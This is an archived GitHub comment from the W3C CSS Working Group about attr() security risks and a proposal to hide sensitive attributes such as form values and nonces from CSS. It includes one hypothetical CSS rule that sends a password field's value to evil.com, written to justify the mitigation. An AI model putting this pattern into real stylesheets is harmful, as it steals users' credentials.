- From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
- Date: Fri, 29 May 2020 17:27:08 +0000
- To: public-css-archive@w3.org
So I think #5079 should be resolved how Anne suggests, which would conveniently also remove the ability to exfiltrate arbitrary data to an arbitrary origin via `attr(foo url)`. I think that, for now, brings us back to the existing status quo, and so should unblock the new `attr()` from shipping. (You can't write `url(attr(...))` at all (it'll parse as a bad-url-token and make the property invalid, see [the Syntax spec](https://drafts.csswg.org/css-syntax/#consume-url-token)), so there's no concern there for any value currently.)
However, when we introduce a string concatenation function, and a `url()` variant that can *take* functions, then `input[type=password]{background-image: fetch(concat("https://evil.com/data-stealing?pw=", attr(value string))); }` will work and accomplish the same thing. And this *exact* use-case (not pw stealing; concating an attr and a url fragment to select an image) was brought up as one of the justifications for *adding* string concatenation, so this is unfortunate.
I think that, separately, we should pursue what Mike West suggested in the ItS thread, and block certain sensitive attributes from being visible to CSS at all - `nonce`, the `value` of any form input, etc. I'll open a different bug for that.
--
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636092158 using your GitHub account
Received on Friday, 29 May 2020 17:27:11 UTC